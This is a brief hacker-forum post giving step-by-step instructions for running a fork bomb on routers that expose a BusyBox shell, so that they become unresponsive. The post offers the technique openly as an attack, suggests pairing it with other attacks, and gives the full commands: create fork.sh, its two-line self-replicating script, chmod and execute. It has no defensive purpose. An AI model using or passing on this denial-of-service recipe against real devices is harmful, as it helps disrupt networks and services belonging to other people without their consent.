This is not a tut as such, more of a note and i take no credit for making the bomb as its in the public domain.
If you go back to the oldskool days people was using fork bombs to crash a server or host. Now as many routers i have come across have a basic busybox shell with /bin/sh enabled. You are able to execute a forkbomb on the router which will make the router unresponsive. This only requires a reboot to fix but can be a devestating attack used in conjunction with other attacks.
just create a file using 'cat > fork.sh' and paste the following lines into the file.
#/bin/sh
$0 & $0
next press 'ctrl-c' to exit and 'chmod 700 fork.sh' to make the script executable. Then simply run the script using ./fork.sh
job done.
Tags:
Share
You need to be a member of House of Hackers to add comments!
Join this Ning Network